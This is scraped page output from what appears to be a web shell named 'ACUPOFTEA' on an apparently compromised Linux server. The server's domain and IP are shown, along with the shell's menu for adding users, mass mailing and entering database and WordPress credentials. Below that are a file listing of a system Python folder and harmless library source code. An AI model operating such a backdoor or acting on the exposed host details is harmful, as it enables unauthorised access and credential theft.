System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
lib2to3
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
pygram.py
# Copyright 2006 Google, Inc. All Rights Reserved. # Licensed to PSF under a Contributor Agreement. """Export the Python grammar and symbols.""" # Python imports import os # Local imports from .pgen2 import token from .pgen2 import driver from . import pytree # The grammar file _GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt") _PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "PatternGrammar.txt") class Symbols(object): def __init__(self, grammar): """Initializer. Creates an attribute for each grammar symbol (nonterminal), whose value is the symbol's type (an int >= 256). """ for name, symbol in grammar.symbol2number.items(): setattr(self, name, symbol) python_grammar = driver.load_packaged_grammar("lib2to3", _GRAMMAR_FILE) python_symbols = Symbols(python_grammar) python_grammar_no_print_statement = python_grammar.copy() del python_grammar_no_print_statement.keywords["print"] pattern_grammar = driver.load_packaged_grammar("lib2to3", _PATTERN_GRAMMAR_FILE) pattern_symbols = Symbols(pattern_grammar)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
..
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
__pycache__
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
fixes
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
pgen2
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
Grammar.txt
text/plain
6.41 KB
-rw-r--r--
2018-12-23 09:37:14
Grammar3.6.8.final.0.pickle
application/octet-stream
31.5 KB
-rw-r--r--
2025-08-26 09:08:07
PatternGrammar.txt
text/plain
793 B
-rw-r--r--
2018-12-23 09:37:14
PatternGrammar3.6.8.final.0.pickle
application/octet-stream
2.04 KB
-rw-r--r--
2025-08-26 09:08:07
__init__.py
text/plain
7 B
-rw-r--r--
2018-12-23 09:37:14
__main__.py
text/x-python
67 B
-rw-r--r--
2018-12-23 09:37:14
btm_matcher.py
text/x-python
6.67 KB
-rw-r--r--
2018-12-23 09:37:14
btm_utils.py
text/x-python
9.73 KB
-rw-r--r--
2018-12-23 09:37:14
fixer_base.py
text/x-python
6.53 KB
-rw-r--r--
2018-12-23 09:37:14
fixer_util.py
text/x-python
14.85 KB
-rw-r--r--
2018-12-23 09:37:14
main.py
text/x-python
11.38 KB
-rw-r--r--
2018-12-23 09:37:14
patcomp.py
text/x-python
6.88 KB
-rw-r--r--
2018-12-23 09:37:14
pygram.py
text/x-python
1.13 KB
-rw-r--r--
2018-12-23 09:37:14
pytree.py
text/x-python
27.39 KB
-rw-r--r--
2018-12-23 09:37:14
refactor.py
text/x-python
27.31 KB
-rw-r--r--
2018-12-23 09:37:14
~ ACUPOFTEA - mail.ontime-ae.com